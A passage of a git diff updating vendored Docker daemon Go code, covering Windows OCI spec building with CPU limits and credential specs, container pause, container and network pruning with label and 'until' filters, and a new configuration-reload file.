+			epList = append(epList, ep)
+		}
+	}
+
+	if gwHNSID != "" {
+		epList = append(epList, gwHNSID)
+	}
+
+	s.Windows.Network = &specs.WindowsNetwork{
+		AllowUnqualifiedDNSQuery:   AllowUnqualifiedDNSQuery,
+		DNSSearchList:              dnsSearch,
+		EndpointList:               epList,
+		NetworkSharedContainerName: networkSharedContainerID,
+	}
+
+	switch img.OS {
+	case "windows":
+		if err := daemon.createSpecWindowsFields(c, &s, isHyperV); err != nil {
+			return nil, err
+		}
+	case "linux":
+		if !system.LCOWSupported() {
+			return nil, fmt.Errorf("Linux containers on Windows are not supported")
+		}
+		if err := daemon.createSpecLinuxFields(c, &s); err != nil {
+			return nil, err
+		}
+	default:
+		return nil, fmt.Errorf("Unsupported platform %q", img.OS)
+	}
+
+	return (*specs.Spec)(&s), nil
+}
+
+// Sets the Windows-specific fields of the OCI spec
+func (daemon *Daemon) createSpecWindowsFields(c *container.Container, s *specs.Spec, isHyperV bool) error {
 	if len(s.Process.Cwd) == 0 {
 		// We default to C:\ to workaround the oddity of the case that the
 		// default directory for cmd running as LocalSystem (or
@@ -57,60 +233,132 @@ func (daemon *Daemon) createSpec(c *container.Container) (*specs.Spec, error) {
 		// as c:\. Hence, setting it to default of c:\ makes for consistency.
 		s.Process.Cwd = `C:\`
 	}
-	s.Process.Env = c.CreateDaemonEnvironment(c.Config.Tty, linkedEnv)
-	s.Process.ConsoleSize.Height = c.HostConfig.ConsoleSize[0]
-	s.Process.ConsoleSize.Width = c.HostConfig.ConsoleSize[1]
-	s.Process.Terminal = c.Config.Tty
-	s.Process.User.Username = c.Config.User
 
-	// In spec.Root. This is not set for Hyper-V containers
-	isHyperV := false
-	if c.HostConfig.Isolation.IsDefault() {
-		// Container using default isolation, so take the default from the daemon configuration
-		isHyperV = daemon.defaultIsolation.IsHyperV()
-	} else {
-		// Container may be requesting an explicit isolation mode.
-		isHyperV = c.HostConfig.Isolation.IsHyperV()
-	}
+	s.Root.Readonly = false // Windows does not support a read-only root filesystem
 	if !isHyperV {
-		s.Root.Path = c.BaseFS
+		if c.BaseFS == nil {
+			return errors.New("createSpecWindowsFields: BaseFS of container " + c.ID + " is unexpectedly nil")
+		}
+
+		s.Root.Path = c.BaseFS.Path() // This is not set for Hyper-V containers
+		if !strings.HasSuffix(s.Root.Path, `\`) {
+			s.Root.Path = s.Root.Path + `\` // Ensure a correctly formatted volume GUID path \\?\Volume{GUID}\
+		}
 	}
-	s.Root.Readonly = false // Windows does not support a read-only root filesystem
+
+	// First boot optimization
+	s.Windows.IgnoreFlushesDuringBoot = !c.HasBeenStartedBefore
 
 	// In s.Windows.Resources
-	// @darrenstahlmsft implement these resources
 	cpuShares := uint16(c.HostConfig.CPUShares)
-	cpuPercent := uint8(c.HostConfig.CPUPercent)
+	cpuMaximum := uint16(c.HostConfig.CPUPercent) * 100
+	cpuCount := uint64(c.HostConfig.CPUCount)
 	if c.HostConfig.NanoCPUs > 0 {
-		cpuPercent = uint8(c.HostConfig.NanoCPUs * 100 / int64(sysinfo.NumCPU()) / 1e9)
+		if isHyperV {
+			cpuCount = uint64(c.HostConfig.NanoCPUs / 1e9)
+			leftoverNanoCPUs := c.HostConfig.NanoCPUs % 1e9
+			if leftoverNanoCPUs != 0 {
+				cpuCount++
+				cpuMaximum = uint16(c.HostConfig.NanoCPUs / int64(cpuCount) / (1e9 / 10000))
+				if cpuMaximum < 1 {
+					// The requested NanoCPUs is so small that we rounded to 0, use 1 instead
+					cpuMaximum = 1
+				}
+			}
+		} else {
+			cpuMaximum = uint16(c.HostConfig.NanoCPUs / int64(sysinfo.NumCPU()) / (1e9 / 10000))
+			if cpuMaximum < 1 {
+				// The requested NanoCPUs is so small that we rounded to 0, use 1 instead
+				cpuMaximum = 1
+			}
+		}
 	}
-	cpuCount := uint64(c.HostConfig.CPUCount)
 	memoryLimit := uint64(c.HostConfig.Memory)
 	s.Windows.Resources = &specs.WindowsResources{
 		CPU: &specs.WindowsCPUResources{
-			Percent: &cpuPercent,
+			Maximum: &cpuMaximum,
 			Shares:  &cpuShares,
 			Count:   &cpuCount,
 		},
 		Memory: &specs.WindowsMemoryResources{
 			Limit: &memoryLimit,
-			//TODO Reservation: ...,
-		},
-		Network: &specs.WindowsNetworkResources{
-		//TODO Bandwidth: ...,
 		},
 		Storage: &specs.WindowsStorageResources{
 			Bps:  &c.HostConfig.IOMaximumBandwidth,
 			Iops: &c.HostConfig.IOMaximumIOps,
 		},
 	}
-	return (*specs.Spec)(&s), nil
+
+	// Read and add credentials from the security options if a credential spec has been provided.
+	if c.HostConfig.SecurityOpt != nil {
+		cs := ""
+		for _, sOpt := range c.HostConfig.SecurityOpt {
+			sOpt = strings.ToLower(sOpt)
+			if !strings.Contains(sOpt, "=") {
+				return fmt.Errorf("invalid security option: no equals sign in supplied value %s", sOpt)
+			}
+			var splitsOpt []string
+			splitsOpt = strings.SplitN(sOpt, "=", 2)
+			if len(splitsOpt) != 2 {
+				return fmt.Errorf("invalid security option: %s", sOpt)
+			}
+			if splitsOpt[0] != "credentialspec" {
+				return fmt.Errorf("security option not supported: %s", splitsOpt[0])
+			}
+
+			var (
+				match   bool
+				csValue string
+				err     error
+			)
+			if match, csValue = getCredentialSpec("file://", splitsOpt[1]); match {
+				if csValue == "" {
+					return fmt.Errorf("no value supplied for file:// credential spec security option")
+				}
+				if cs, err = readCredentialSpecFile(c.ID, daemon.root, filepath.Clean(csValue)); err != nil {
+					return err
+				}
+			} else if match, csValue = getCredentialSpec("registry://", splitsOpt[1]); match {
+				if csValue == "" {
+					return fmt.Errorf("no value supplied for registry:// credential spec security option")
+				}
+				if cs, err = readCredentialSpecRegistry(c.ID, csValue); err != nil {
+					return err
+				}
+			} else {
+				return fmt.Errorf("invalid credential spec security option - value must be prefixed file:// or registry:// followed by a value")
+			}
+		}
+		s.Windows.CredentialSpec = cs
+	}
+
+	return nil
+}
+
+// Sets the Linux-specific fields of the OCI spec
+// TODO: @jhowardmsft LCOW Support. We need to do a lot more pulling in what can
+// be pulled in from oci_linux.go.
+func (daemon *Daemon) createSpecLinuxFields(c *container.Container, s *specs.Spec) error {
+	if len(s.Process.Cwd) == 0 {
+		s.Process.Cwd = `/`
+	}
+	s.Root.Path = "rootfs"
+	s.Root.Readonly = c.HostConfig.ReadonlyRootfs
+	if err := setCapabilities(s, c); err != nil {
+		return fmt.Errorf("linux spec capabilities: %v", err)
+	}
+	devPermissions, err := appendDevicePermissionsFromCgroupRules(nil, c.HostConfig.DeviceCgroupRules)
+	if err != nil {
+		return fmt.Errorf("linux runtime spec devices: %v", err)
+	}
+	s.Linux.Resources.Devices = devPermissions
+	return nil
 }
 
 func escapeArgs(args []string) []string {
 	escapedArgs := make([]string, len(args))
 	for i, a := range args {
-		escapedArgs[i] = syscall.EscapeArg(a)
+		escapedArgs[i] = windows.EscapeArg(a)
 	}
 	return escapedArgs
 }
@@ -120,3 +368,52 @@ func escapeArgs(args []string) []string {
 func (daemon *Daemon) mergeUlimits(c *containertypes.HostConfig) {
 	return
 }
+
+// getCredentialSpec is a helper function to get the value of a credential spec supplied
+// on the CLI, stripping the prefix
+func getCredentialSpec(prefix, value string) (bool, string) {
+	if strings.HasPrefix(value, prefix) {
+		return true, strings.TrimPrefix(value, prefix)
+	}
+	return false, ""
+}
+
+// readCredentialSpecRegistry is a helper function to read a credential spec from
+// the registry. If not found, we return an empty string and warn in the log.
+// This allows for staging on machines which do not have the necessary components.
+func readCredentialSpecRegistry(id, name string) (string, error) {
+	var (
+		k   registry.Key
+		err error
+		val string
+	)
+	if k, err = registry.OpenKey(registry.LOCAL_MACHINE, credentialSpecRegistryLocation, registry.QUERY_VALUE); err != nil {
+		return "", fmt.Errorf("failed handling spec %q for container %s - %s could not be opened", name, id, credentialSpecRegistryLocation)
+	}
+	if val, _, err = k.GetStringValue(name); err != nil {
+		if err == registry.ErrNotExist {
+			return "", fmt.Errorf("credential spec %q for container %s as it was not found", name, id)
+		}
+		return "", fmt.Errorf("error %v reading credential spec %q from registry for container %s", err, name, id)
+	}
+	return val, nil
+}
+
+// readCredentialSpecFile is a helper function to read a credential spec from
+// a file. If not found, we return an empty string and warn in the log.
+// This allows for staging on machines which do not have the necessary components.
+func readCredentialSpecFile(id, root, location string) (string, error) {
+	if filepath.IsAbs(location) {
+		return "", fmt.Errorf("invalid credential spec - file:// path cannot be absolute")
+	}
+	base := filepath.Join(root, credentialSpecFileLocation)
+	full := filepath.Join(base, location)
+	if !strings.HasPrefix(full, base) {
+		return "", fmt.Errorf("invalid credential spec - file:// path must be under %s", base)
+	}
+	bcontents, err := ioutil.ReadFile(full)
+	if err != nil {
+		return "", fmt.Errorf("credential spec '%s' for container %s as the file could not be read: %q", full, id, err)
+	}
+	return string(bcontents[:]), nil
+}
diff --git a/vendor/github.com/docker/docker/daemon/pause.go b/vendor/github.com/docker/docker/daemon/pause.go
index dbfafbc5fd..be6ec1b92a 100644
--- a/vendor/github.com/docker/docker/daemon/pause.go
+++ b/vendor/github.com/docker/docker/daemon/pause.go
@@ -1,9 +1,11 @@
-package daemon
+package daemon // import "github.com/docker/docker/daemon"
 
 import (
+	"context"
 	"fmt"
 
 	"github.com/docker/docker/container"
+	"github.com/sirupsen/logrus"
 )
 
 // ContainerPause pauses a container
@@ -12,12 +14,7 @@ func (daemon *Daemon) ContainerPause(name string) error {
 	if err != nil {
 		return err
 	}
-
-	if err := daemon.containerPause(container); err != nil {
-		return err
-	}
-
-	return nil
+	return daemon.containerPause(container)
 }
 
 // containerPause pauses the container execution without stopping the process.
@@ -28,12 +25,12 @@ func (daemon *Daemon) containerPause(container *container.Container) error {
 
 	// We cannot Pause the container which is not running
 	if !container.Running {
-		return errNotRunning{container.ID}
+		return errNotRunning(container.ID)
 	}
 
 	// We cannot Pause the container which is already paused
 	if container.Paused {
-		return fmt.Errorf("Container %s is already paused", container.ID)
+		return errNotPaused(container.ID)
 	}
 
 	// We cannot Pause the container which is restarting
@@ -41,9 +38,18 @@ func (daemon *Daemon) containerPause(container *container.Container) error {
 		return errContainerIsRestarting(container.ID)
 	}
 
-	if err := daemon.containerd.Pause(container.ID); err != nil {
+	if err := daemon.containerd.Pause(context.Background(), container.ID); err != nil {
 		return fmt.Errorf("Cannot pause container %s: %s", container.ID, err)
 	}
 
+	container.Paused = true
+	daemon.setStateCounter(container)
+	daemon.updateHealthMonitor(container)
+	daemon.LogContainerEvent(container, "pause")
+
+	if err := container.CheckpointTo(daemon.containersReplica); err != nil {
+		logrus.WithError(err).Warn("could not save container to disk")
+	}
+
 	return nil
 }
diff --git a/vendor/github.com/docker/docker/daemon/prune.go b/vendor/github.com/docker/docker/daemon/prune.go
index a693beb4e1..b690f2e552 100644
--- a/vendor/github.com/docker/docker/daemon/prune.go
+++ b/vendor/github.com/docker/docker/daemon/prune.go
@@ -1,165 +1,87 @@
-package daemon
+package daemon // import "github.com/docker/docker/daemon"
 
 import (
+	"context"
 	"fmt"
 	"regexp"
+	"sync/atomic"
+	"time"
 
-	"github.com/Sirupsen/logrus"
-	"github.com/docker/distribution/digest"
 	"github.com/docker/docker/api/types"
 	"github.com/docker/docker/api/types/filters"
-	"github.com/docker/docker/image"
-	"github.com/docker/docker/layer"
-	"github.com/docker/docker/pkg/directory"
-	"github.com/docker/docker/reference"
+	timetypes "github.com/docker/docker/api/types/time"
+	"github.com/docker/docker/errdefs"
 	"github.com/docker/docker/runconfig"
-	"github.com/docker/docker/volume"
 	"github.com/docker/libnetwork"
+	"github.com/pkg/errors"
+	"github.com/sirupsen/logrus"
 )
 
-// ContainersPrune removes unused containers
-func (daemon *Daemon) ContainersPrune(pruneFilters filters.Args) (*types.ContainersPruneReport, error) {
-	rep := &types.ContainersPruneReport{}
+var (
+	// errPruneRunning is returned when a prune request is received while
+	// one is in progress
+	errPruneRunning = errdefs.Conflict(errors.New("a prune operation is already running"))
 
-	allContainers := daemon.List()
-	for _, c := range allContainers {
-		if !c.IsRunning() {
-			cSize, _ := daemon.getSize(c)
-			// TODO: sets RmLink to true?
-			err := daemon.ContainerRm(c.ID, &types.ContainerRmConfig{})
-			if err != nil {
-				logrus.Warnf("failed to prune container %s: %v", c.ID, err)
-				continue
-			}
-			if cSize > 0 {
-				rep.SpaceReclaimed += uint64(cSize)
-			}
-			rep.ContainersDeleted = append(rep.ContainersDeleted, c.ID)
-		}
+	containersAcceptedFilters = map[string]bool{
+		"label":  true,
+		"label!": true,
+		"until":  true,
 	}
 
-	return rep, nil
-}
-
-// VolumesPrune removes unused local volumes
-func (daemon *Daemon) VolumesPrune(pruneFilters filters.Args) (*types.VolumesPruneReport, error) {
-	rep := &types.VolumesPruneReport{}
-
-	pruneVols := func(v volume.Volume) error {
-		name := v.Name()
-		refs := daemon.volumes.Refs(v)
-
-		if len(refs) == 0 {
-			vSize, err := directory.Size(v.Path())
-			if err != nil {
-				logrus.Warnf("could not determine size of volume %s: %v", name, err)
-			}
-			err = daemon.volumes.Remove(v)
-			if err != nil {
-				logrus.Warnf("could not remove volume %s: %v", name, err)
-				return nil
-			}
-			rep.SpaceReclaimed += uint64(vSize)
-			rep.VolumesDeleted = append(rep.VolumesDeleted, name)
-		}
-
-		return nil
+	networksAcceptedFilters = map[string]bool{
+		"label":  true,
+		"label!": true,
+		"until":  true,
 	}
+)
 
-	err := daemon.traverseLocalVolumes(pruneVols)
-
-	return rep, err
-}
+// ContainersPrune removes unused containers
+func (daemon *Daemon) ContainersPrune(ctx context.Context, pruneFilters filters.Args) (*types.ContainersPruneReport, error) {
+	if !atomic.CompareAndSwapInt32(&daemon.pruneRunning, 0, 1) {
+		return nil, errPruneRunning
+	}
+	defer atomic.StoreInt32(&daemon.pruneRunning, 0)
 
-// ImagesPrune removes unused images
-func (daemon *Daemon) ImagesPrune(pruneFilters filters.Args) (*types.ImagesPruneReport, error) {
-	rep := &types.ImagesPruneReport{}
+	rep := &types.ContainersPruneReport{}
 
-	danglingOnly := true
-	if pruneFilters.Include("dangling") {
-		if pruneFilters.ExactMatch("dangling", "false") || pruneFilters.ExactMatch("dangling", "0") {
-			danglingOnly = false
-		} else if !pruneFilters.ExactMatch("dangling", "true") && !pruneFilters.ExactMatch("dangling", "1") {
-			return nil, fmt.Errorf("Invalid filter 'dangling=%s'", pruneFilters.Get("dangling"))
-		}
+	// make sure that only accepted filters have been received
+	err := pruneFilters.Validate(containersAcceptedFilters)
+	if err != nil {
+		return nil, err
 	}
 
-	var allImages map[image.ID]*image.Image
-	if danglingOnly {
-		allImages = daemon.imageStore.Heads()
-	} else {
-		allImages = daemon.imageStore.Map()
+	until, err := getUntilFromPruneFilters(pruneFilters)
+	if err != nil {
+		return nil, err
 	}
+
 	allContainers := daemon.List()
-	imageRefs := map[string]bool{}
 	for _, c := range allContainers {
-		imageRefs[c.ID] = true
-	}
-
-	// Filter intermediary images and get their unique size
-	allLayers := daemon.layerStore.Map()
-	topImages := map[image.ID]*image.Image{}
-	for id, img := range allImages {
-		dgst := digest.Digest(id)
-		if len(daemon.referenceStore.References(dgst)) == 0 && len(daemon.imageStore.Children(id)) != 0 {
-			continue
+		select {
+		case <-ctx.Done():
+			logrus.Debugf("ContainersPrune operation cancelled: %#v", *rep)
+			return rep, nil
+		default:
 		}
-		topImages[id] = img
-	}
 
-	for id := range topImages {
-		dgst := digest.Digest(id)
-		hex := dgst.Hex()
-		if _, ok := imageRefs[hex]; ok {
-			continue
-		}
-
-		deletedImages := []types.ImageDelete{}
-		refs := daemon.referenceStore.References(dgst)
-		if len(refs) > 0 {
-			if danglingOnly {
-				// Not a dangling image
+		if !c.IsRunning() {
+			if !until.IsZero() && c.Created.After(until) {
 				continue
 			}
-
-			nrRefs := len(refs)
-			for _, ref := range refs {
-				// If nrRefs == 1, we have an image marked as myreponame:<none>
-				// i.e. the tag content was changed
-				if _, ok := ref.(reference.Canonical); ok && nrRefs > 1 {
-					continue
-				}
-				imgDel, err := daemon.ImageDelete(ref.String(), false, true)
-				if err != nil {
-					logrus.Warnf("could not delete reference %s: %v", ref.String(), err)
-					continue
-				}
-				deletedImages = append(deletedImages, imgDel...)
+			if !matchLabels(pruneFilters, c.Config.Labels) {
+				continue
 			}
-		} else {
-			imgDel, err := daemon.ImageDelete(hex, false, true)
+			cSize, _ := daemon.imageService.GetContainerLayerSize(c.ID)
+			// TODO: sets RmLink to true?
+			err := daemon.ContainerRm(c.ID, &types.ContainerRmConfig{})
 			if err != nil {
-				logrus.Warnf("could not delete image %s: %v", hex, err)
+				logrus.Warnf("failed to prune container %s: %v", c.ID, err)
 				continue
 			}
-			deletedImages = append(deletedImages, imgDel...)
-		}
-
-		rep.ImagesDeleted = append(rep.ImagesDeleted, deletedImages...)
-	}
-
-	// Compute how much space was freed
-	for _, d := range rep.ImagesDeleted {
-		if d.Deleted != "" {
-			chid := layer.ChainID(d.Deleted)
-			if l, ok := allLayers[chid]; ok {
-				diffSize, err := l.DiffSize()
-				if err != nil {
-					logrus.Warnf("failed to get layer %s size: %v", chid, err)
-					continue
-				}
-				rep.SpaceReclaimed += uint64(diffSize)
+			if cSize > 0 {
+				rep.SpaceReclaimed += uint64(cSize)
 			}
+			rep.ContainersDeleted = append(rep.ContainersDeleted, c.ID)
 		}
 	}
 
@@ -167,70 +89,162 @@ func (daemon *Daemon) ImagesPrune(pruneFilters filters.Args) (*types.ImagesPrune
 }
 
 // localNetworksPrune removes unused local networks
-func (daemon *Daemon) localNetworksPrune(pruneFilters filters.Args) (*types.NetworksPruneReport, error) {
+func (daemon *Daemon) localNetworksPrune(ctx context.Context, pruneFilters filters.Args) *types.NetworksPruneReport {
 	rep := &types.NetworksPruneReport{}
-	var err error
+
+	until, _ := getUntilFromPruneFilters(pruneFilters)
+
 	// When the function returns true, the walk will stop.
 	l := func(nw libnetwork.Network) bool {
+		select {
+		case <-ctx.Done():
+			// context cancelled
+			return true
+		default:
+		}
+		if nw.Info().ConfigOnly() {
+			return false
+		}
+		if !until.IsZero() && nw.Info().Created().After(until) {
+			return false
+		}
+		if !matchLabels(pruneFilters, nw.Info().Labels()) {
+			return false
+		}
 		nwName := nw.Name()
-		predefined := runconfig.IsPreDefinedNetwork(nwName)
-		if !predefined && len(nw.Endpoints()) == 0 {
-			if err = daemon.DeleteNetwork(nw.ID()); err != nil {
-				logrus.Warnf("could not remove network %s: %v", nwName, err)
-				return false
-			}
-			rep.NetworksDeleted = append(rep.NetworksDeleted, nwName)
+		if runconfig.IsPreDefinedNetwork(nwName) {
+			return false
 		}
+		if len(nw.Endpoints()) > 0 {
+			return false
+		}
+		if err := daemon.DeleteNetwork(nw.ID()); err != nil {
+			logrus.Warnf("could not remove local network %s: %v", nwName, err)
+			return false
+		}
+		rep.NetworksDeleted = append(rep.NetworksDeleted, nwName)
 		return false
 	}
 	daemon.netController.WalkNetworks(l)
-	return rep, err
+	return rep
 }
 
 // clusterNetworksPrune removes unused cluster networks
-func (daemon *Daemon) clusterNetworksPrune(pruneFilters filters.Args) (*types.NetworksPruneReport, error) {
+func (daemon *Daemon) clusterNetworksPrune(ctx context.Context, pruneFilters filters.Args) (*types.NetworksPruneReport, error) {
 	rep := &types.NetworksPruneReport{}
+
+	until, _ := getUntilFromPruneFilters(pruneFilters)
+
 	cluster := daemon.GetCluster()
+
+	if !cluster.IsManager() {
+		return rep, nil
+	}
+
 	networks, err := cluster.GetNetworks()
 	if err != nil {
 		return rep, err
 	}
 	networkIsInUse := regexp.MustCompile(`network ([[:alnum:]]+) is in use`)
 	for _, nw := range networks {
-		if nw.Name == "ingress" {
-			continue
-		}
-		// https://github.com/docker/docker/issues/24186
-		// `docker network inspect` unfortunately displays ONLY those containers that are local to that node.
-		// So we try to remove it anyway and check the error
-		err = cluster.RemoveNetwork(nw.ID)
-		if err != nil {
-			// we can safely ignore the "network .. is in use" error
-			match := networkIsInUse.FindStringSubmatch(err.Error())
-			if len(match) != 2 || match[1] != nw.ID {
-				logrus.Warnf("could not remove network %s: %v", nw.Name, err)
+		select {
+		case <-ctx.Done():
+			return rep, nil
+		default:
+			if nw.Ingress {
+				// Routing-mesh network removal has to be explicitly invoked by user
+				continue
 			}
-			continue
+			if !until.IsZero() && nw.Created.After(until) {
+				continue
+			}
+			if !matchLabels(pruneFilters, nw.Labels) {
+				continue
+			}
+			// https://github.com/docker/docker/issues/24186
+			// `docker network inspect` unfortunately displays ONLY those containers that are local to that node.
+			// So we try to remove it anyway and check the error
+			err = cluster.RemoveNetwork(nw.ID)
+			if err != nil {
+				// we can safely ignore the "network .. is in use" error
+				match := networkIsInUse.FindStringSubmatch(err.Error())
+				if len(match) != 2 || match[1] != nw.ID {
+					logrus.Warnf("could not remove cluster network %s: %v", nw.Name, err)
+				}
+				continue
+			}
+			rep.NetworksDeleted = append(rep.NetworksDeleted, nw.Name)
 		}
-		rep.NetworksDeleted = append(rep.NetworksDeleted, nw.Name)
 	}
 	return rep, nil
 }
 
 // NetworksPrune removes unused networks
-func (daemon *Daemon) NetworksPrune(pruneFilters filters.Args) (*types.NetworksPruneReport, error) {
-	rep := &types.NetworksPruneReport{}
-	clusterRep, err := daemon.clusterNetworksPrune(pruneFilters)
+func (daemon *Daemon) NetworksPrune(ctx context.Context, pruneFilters filters.Args) (*types.NetworksPruneReport, error) {
+	if !atomic.CompareAndSwapInt32(&daemon.pruneRunning, 0, 1) {
+		return nil, errPruneRunning
+	}
+	defer atomic.StoreInt32(&daemon.pruneRunning, 0)
+
+	// make sure that only accepted filters have been received
+	err := pruneFilters.Validate(networksAcceptedFilters)
 	if err != nil {
-		logrus.Warnf("could not remove cluster networks: %v", err)
-	} else {
+		return nil, err
+	}
+
+	if _, err := getUntilFromPruneFilters(pruneFilters); err != nil {
+		return nil, err
+	}
+
+	rep := &types.NetworksPruneReport{}
+	if clusterRep, err := daemon.clusterNetworksPrune(ctx, pruneFilters); err == nil {
 		rep.NetworksDeleted = append(rep.NetworksDeleted, clusterRep.NetworksDeleted...)
 	}
-	localRep, err := daemon.localNetworksPrune(pruneFilters)
+
+	localRep := daemon.localNetworksPrune(ctx, pruneFilters)
+	rep.NetworksDeleted = append(rep.NetworksDeleted, localRep.NetworksDeleted...)
+
+	select {
+	case <-ctx.Done():
+		logrus.Debugf("NetworksPrune operation cancelled: %#v", *rep)
+		return rep, nil
+	default:
+	}
+
+	return rep, nil
+}
+
+func getUntilFromPruneFilters(pruneFilters filters.Args) (time.Time, error) {
+	until := time.Time{}
+	if !pruneFilters.Contains("until") {
+		return until, nil
+	}
+	untilFilters := pruneFilters.Get("until")
+	if len(untilFilters) > 1 {
+		return until, fmt.Errorf("more than one until filter specified")
+	}
+	ts, err := timetypes.GetTimestamp(untilFilters[0], time.Now())
+	if err != nil {
+		return until, err
+	}
+	seconds, nanoseconds, err := timetypes.ParseTimestamps(ts, 0)
 	if err != nil {
-		logrus.Warnf("could not remove local networks: %v", err)
-	} else {
-		rep.NetworksDeleted = append(rep.NetworksDeleted, localRep.NetworksDeleted...)
+		return until, err
+	}
+	until = time.Unix(seconds, nanoseconds)
+	return until, nil
+}
+
+func matchLabels(pruneFilters filters.Args, labels map[string]string) bool {
+	if !pruneFilters.MatchKVList("label", labels) {
+		return false
+	}
+	// By default MatchKVList will return true if field (like 'label!') does not exist
+	// So we have to add additional Contains("label!") check
+	if pruneFilters.Contains("label!") {
+		if pruneFilters.MatchKVList("label!", labels) {
+			return false
+		}
 	}
-	return rep, err
+	return true
 }
diff --git a/vendor/github.com/docker/docker/daemon/reload.go b/vendor/github.com/docker/docker/daemon/reload.go
new file mode 100644
index 0000000000..210864ff87
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/reload.go
@@ -0,0 +1,324 @@
+package daemon // import "github.com/docker/docker/daemon"
+
+import (
+	"encoding/json"
+	"fmt"
+
+	"github.com/docker/docker/daemon/config"
+	"github.com/docker/docker/daemon/discovery"
+	"github.com/sirupsen/logrus"
+)
+
+// Reload reads configuration changes and modifies the
+// daemon according to those changes.
+// These are the settings that Reload changes:
+// - Platform runtime
+// - Daemon debug log level
+// - Daemon max concurrent downloads
+// - Daemon max concurrent uploads
+// - Daemon shutdown timeout (in seconds)
+// - Cluster discovery (reconfigure and restart)
+// - Daemon labels
+// - Insecure registries
+// - Registry mirrors
+// - Daemon live restore
+func (daemon *Daemon) Reload(conf *config.Config) (err error) {
+	daemon.configStore.Lock()
+	attributes := map[string]string{}
+
+	defer func() {
+		jsonString, _ := json.Marshal(daemon.configStore)
+
+		// we're unlocking here, because
+		// LogDaemonEventWithAttributes() -> SystemInfo() -> GetAllRuntimes()
+		// holds that lock too.
+		daemon.configStore.Unlock()
+		if err == nil {
+			logrus.Infof("Reloaded configuration: %s", jsonString)
+			daemon.LogDaemonEventWithAttributes("reload", attributes)
+		}
+	}()
+
+	if err := daemon.reloadPlatform(conf, attributes); err != nil {
+		return err
+	}
+	daemon.reloadDebug(conf, attributes)
+	daemon.reloadMaxConcurrentDownloadsAndUploads(conf, attributes)
+	daemon.reloadShutdownTimeout(conf, attributes)
+
+	if err := daemon.reloadClusterDiscovery(conf, attributes); err != nil {
+		return err
+	}
+	if err := daemon.reloadLabels(conf, attributes); err != nil {
+		return err
+	}
+	if err := daemon.reloadAllowNondistributableArtifacts(conf, attributes); err != nil {
+		return err
+	}
+	if err := daemon.reloadInsecureRegistries(conf, attributes); err != nil {
+		return err
+	}
+	if err := daemon.reloadRegistryMirrors(conf, attributes); err != nil {
+		return err
+	}
+	if err := daemon.reloadLiveRestore(conf, attributes); err != nil {
+		return err
+	}
+	return daemon.reloadNetworkDiagnosticPort(conf, attributes)
+}
+
+// reloadDebug updates configuration with Debug option
+// and updates the passed attributes
+func (daemon *Daemon) reloadDebug(conf *config.Config, attributes map[string]string) {
+	// update corresponding configuration
+	if conf.IsValueSet("debug") {
+		daemon.configStore.Debug = conf.Debug
+	}
+	// prepare reload event attributes with updatable configurations
+	attributes["debug"] = fmt.Sprintf("%t", daemon.configStore.Debug)
+}
+
+// reloadMaxConcurrentDownloadsAndUploads updates configuration with max concurrent
+// download and upload options and updates the passed attributes
+func (daemon *Daemon) reloadMaxConcurrentDownloadsAndUploads(conf *config.Config, attributes map[string]string) {
+	// If no value is set for max-concurrent-downloads we assume it is the default value
+	// We always "reset" as the cost is lightweight and easy to maintain.
+	if conf.IsValueSet("max-concurrent-downloads") && conf.MaxConcurrentDownloads != nil {
+		*daemon.configStore.MaxConcurrentDownloads = *conf.MaxConcurrentDownloads
+	} else {
+		maxConcurrentDownloads := config.DefaultMaxConcurrentDownloads
+		daemon.configStore.MaxConcurrentDownloads = &maxConcurrentDownloads
+	}
+	logrus.Debugf("Reset Max Concurrent Downloads: %d", *daemon.configStore.MaxConcurrentDownloads)
+
+	// If no value is set for max-concurrent-upload we assume it is the default value
+	// We always "reset" as the cost is lightweight and easy to maintain.
+	if conf.IsValueSet("max-concurrent-uploads") && conf.MaxConcurrentUploads != nil {
+		*daemon.configStore.MaxConcurrentUploads = *conf.MaxConcurrentUploads
+	} else {
+		maxConcurrentUploads := config.DefaultMaxConcurrentUploads
+		daemon.configStore.MaxConcurrentUploads = &maxConcurrentUploads
+	}
+	logrus.Debugf("Reset Max Concurrent Uploads: %d", *daemon.configStore.MaxConcurrentUploads)
+
+	daemon.imageService.UpdateConfig(conf.MaxConcurrentDownloads, conf.MaxConcurrentUploads)
+	// prepare reload event attributes with updatable configurations
+	attributes["max-concurrent-downloads"] = fmt.Sprintf("%d", *daemon.configStore.MaxConcurrentDownloads)
+	// prepare reload event attributes with updatable configurations
+	attributes["max-concurrent-uploads"] = fmt.Sprintf("%d", *daemon.configStore.MaxConcurrentUploads)
+}
+
+// reloadShutdownTimeout updates configuration with daemon shutdown timeout option
+// and updates the passed attributes
+func (daemon *Daemon) reloadShutdownTimeout(conf *config.Config, attributes map[string]string) {
+	// update corresponding configuration
+	if conf.IsValueSet("shutdown-timeout") {
+		daemon.configStore.ShutdownTimeout = conf.ShutdownTimeout
+		logrus.Debugf("Reset Shutdown Timeout: %d", daemon.configStore.ShutdownTimeout)
+	}
+
+	// prepare reload event attributes with updatable configurations
+	attributes["shutdown-timeout"] = fmt.Sprintf("%d", daemon.configStore.ShutdownTimeout)
+}
+
+// reloadClusterDiscovery updates configuration with cluster discovery options
+// and updates the passed attributes
+func (daemon *Daemon) reloadClusterDiscovery(conf *config.Config, attributes map[string]string) (err error) {
+	defer func() {
+		// prepare reload event attributes with updatable configurations
+		attributes["cluster-store"] = conf.ClusterStore
+		attributes["cluster-advertise"] = conf.ClusterAdvertise
+
+		attributes["cluster-store-opts"] = "{}"
+		if daemon.configStore.ClusterOpts != nil {
+			opts, err2 := json.Marshal(conf.ClusterOpts)
+			if err != nil {
+				err = err2
+			}
+			attributes["cluster-store-opts"] = string(opts)
+		}
+	}()
+
+	newAdvertise := conf.ClusterAdvertise
+	newClusterStore := daemon.configStore.ClusterStore
+	if conf.IsValueSet("cluster-advertise") {
+		if conf.IsValueSet("cluster-store") {
+			newClusterStore = conf.ClusterStore
+		}
+		newAdvertise, err = config.ParseClusterAdvertiseSettings(newClusterStore, conf.ClusterAdvertise)
+		if err != nil && err != discovery.ErrDiscoveryDisabled {
+			return err
+		}
+	}
+
+	if daemon.clusterProvider != nil {
+		if err := conf.IsSwarmCompatible(); err != nil {
+			return err
+		}
+	}
+
+	// check discovery modifications
+	if !config.ModifiedDiscoverySettings(daemon.configStore, newClusterStore, newAdvertise, conf.ClusterOpts) {
+		return nil
+	}
+
+	// enable discovery for the first time if it was not previously enabled
+	if daemon.discoveryWatcher == nil {
+		discoveryWatcher, err := discovery.Init(newClusterStore, newAdvertise, conf.ClusterOpts)
+		if err != nil {
+			return fmt.Errorf("failed to initialize discovery: %v", err)
+		}
